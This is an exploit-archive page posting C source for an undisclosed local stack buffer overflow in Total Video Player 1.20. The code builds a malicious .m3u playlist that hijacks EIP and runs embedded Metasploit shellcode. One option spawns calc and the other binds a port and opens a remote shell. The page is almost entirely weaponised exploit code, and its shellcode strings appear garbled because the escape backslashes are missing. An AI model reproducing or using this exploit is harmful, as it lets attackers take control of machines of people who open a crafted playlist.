Home / os / win10

tvp120-overflow.txt

Posted on 08 February 2008

/*0day Total Video Player V1.20 .M3u File Local Stack Buffer Overflow
This exploit spawns Calc.exe or binds a port and spawns a shell and tested on Windows Xp sp 2.
I got the ideea to look in a prior version of TVP and
surprinse vuln to ,just as V1.30.
When parsing a crafted .m3u file stack gets corrupted,due a
long string,and causes a stack overflow.We get control of the EBP and
EIP registers.The ESP register points exactly after the retaddress position.
[corrupted stack] [EIP->points here][ESP->points here]
So do a jmp back and a JMP ESP and it points to a specific part of
the stack that I want.Credits to finding this bug && sploit go to fl0 fl0w.
Vendor not informed yet.
Special THANKS to Expanders !!!!
*/
#include<stdio.h>
#include <stdlib.h>
#include <string.h>
#include<windows.h>

#define FIRST "#EXTM3U
#EXTINF:3:50,-Ombladon - Noapte Buna Bucuresti Feat. Guesswho
D:\"
#define LAST ".mp3
"
#define OFFSET 545

#define EVILFILE "evil.m3u"

//shellcode from metasploit
char scz1[]=
"xebx03x59xebx05xe8xf8xffxffxffx49x49x49x49x49x49"
"x49x49x49x49x49x49x49x49x49x49x49x51x5ax37x6ax63"
"x58x30x42x30x50x42x6bx42x41x73x41x42x32x42x41x32"
"x41x41x30x41x41x58x38x42x42x50x75x38x69x69x6cx38"
"x68x41x54x77x70x57x70x75x50x6ex6bx41x55x55x6cx6e"
"x6bx43x4cx66x65x41x68x45x51x58x6fx4cx4bx50x4fx62"
"x38x6ex6bx41x4fx31x30x36x61x4ax4bx41x59x6cx4bx74"
"x74x6ex6bx44x41x4ax4ex47x41x4bx70x6fx69x6cx6cx4c"
"x44x4bx70x43x44x76x67x4bx71x4ax6ax66x6dx66x61x39"
"x52x5ax4bx4ax54x75x6bx62x74x56x44x73x34x41x65x4b"
"x55x4ex6bx73x6fx54x64x53x31x6ax4bx35x36x6cx4bx64"
"x4cx30x4bx6cx4bx73x6fx57x6cx75x51x6ax4bx6cx4bx37"
"x6cx6cx4bx77x71x68x6bx4cx49x71x4cx51x34x43x34x6b"
"x73x46x51x79x50x71x74x4cx4bx67x30x36x50x4cx45x4b"
"x70x62x58x74x4cx6cx4bx53x70x56x6cx4ex6bx34x30x47"
"x6cx4ex4dx6cx4bx70x68x37x78x58x6bx53x39x6cx4bx4f"
"x70x6cx70x53x30x43x30x73x30x6cx4bx42x48x77x4cx61"
"x4fx44x71x6bx46x73x50x72x76x6bx39x5ax58x6fx73x4f"
"x30x73x4bx56x30x31x78x61x6ex6ax78x4bx52x74x33x55"
"x38x4ax38x69x6ex6cx4ax54x4ex52x77x79x6fx79x77x42"
"x43x50x61x70x6cx41x73x64x6ex51x75x52x58x31x75x57"
"x70x63";
char scz2[]="x31xc9x83xe9xb0xd9xeexd9x74x24xf4x5bx81x73x13x50"
"x8axfax90x83xebxfcxe2xf4xacxe0x11xddxb8x73x05x6f"
"xafxeax71xfcx74xaex71xd5x6cx01x86x95x28x8bx15x1b"
"x1fx92x71xcfx70x8bx11xd9xdbxbex71x91xbexbbx3ax09"
"xfcx0ex3axe4x57x4bx30x9dx51x48x11x64x6bxdexdexb8"
"x25x6fx71xcfx74x8bx11xf6xdbx86xb1x1bx0fx96xfbx7b"
"x53xa6x71x19x3cxaexe6xf1x93xbbx21xf4xdbxc9xcax1b"
"x10x86x71xe0x4cx27x71xd0x58xd4x92x1ex1ex84x16xc0"
"xafx5cx9cxc3x36xe2xc9xa2x38xfdx89xa2x0fxdex05x40"
"x38x41x17x6cx6bxdax05x46x0fx03x1fxf6xd1x67xf2x92"
"x05xe0xf8x6fx80xe2x23x99xa5x27xadx6fx86xd9xa9xc3"
"x03xd9xb9xc3x13xd9x05x40x36xe2xebxccx36xd9x73x71"
"xc5xe2x5ex8ax20x4dxadx6fx86xe0xeaxc1x05x75x2axf8"
"xf4x27xd4x79x07x75x2cxc3x05x75x2axf8xb5xc3x7cxd9"
"x07x75x2cxc0x04xdexafx6fx80x19x92x77x29x4cx83xc7"
"xafx5cxafx6fx80xecx90xf4x36xe2x99xfdxd9x6fx90xc0"
"x09xa3x36x19xb7xe0xbex19xb2xbbx3ax63xfax74xb8xbd"
"xaexc8xd6x03xddxf0xc2x3bxfbx21x92xe2xaex39xecx6f"
"x25xcex05x46x0bxddxa8xc1x01xdbx90x91x01xdbxafxc1"
"xafx5ax92x3dx89x8fx34xc3xafx5cx90x6fxafxbdx05x40"
"xdbxddx06x13x94xeex05x46x02x75x2axf8x2ex52x18xe3"
"x03x75x2cx6fx80x8axfax90";

char jmpback[] = "xE9xDExFDxFFxFF";
void Notes();

int main()
{
FILE *p;
unsigned char *buffer;
unsigned int offset=0;
unsigned int retaddress=0x015EE557;
int input=0;
Notes();
if((p=fopen(EVILFILE,"wb"))==NULL)
{ printf("error
"); exit(0);
}
scanf("%d",&input);
switch(input)
{  case 1:
buffer=(unsigned char *)malloc(OFFSET+5+strlen(scz1)+12);

memset(buffer+offset,0x90,OFFSET+5+strlen(scz1)+12);
offset=OFFSET;

memcpy(buffer+offset,&retaddress,4);
offset=OFFSET+4;
offset+=12;
memcpy(buffer+offset,scz1,strlen(scz1));
offset+=strlen(scz1);
memset(buffer+offset,0x00,1);
fprintf(p,"%s%s%s",FIRST,buffer,LAST);
fclose(p);
break;
case 2:
buffer=(unsigned char *)malloc(OFFSET+5+strlen(scz2)+12);

memset(buffer+offset,0x90,OFFSET+5+strlen(scz2)+12);
offset=OFFSET;

memcpy(buffer+offset,&retaddress,4);
offset=OFFSET+4;
offset+=12;
memcpy(buffer+offset,scz2,strlen(scz2));
offset+=strlen(scz2);
memset(buffer+offset,0x00,1);
fprintf(p,"%s%s%s",FIRST,buffer,LAST);
fclose(p);
break;
}

free(buffer);
return 0;
}

void Notes()
{   printf("^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

");
printf("Total Video Player V1.20 .M3u File Local Stack Buffer Overflow
");
printf("Credits for finding this bug&&sploit go to fl0 fl0w
");
printf("SPECIAL THANKS TO EXPANDERS

");
printf("{1}Spawn Calc.exe
");
printf("{2}Bind port&&spanw a shell

");
printf("^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
");
}

 

TOP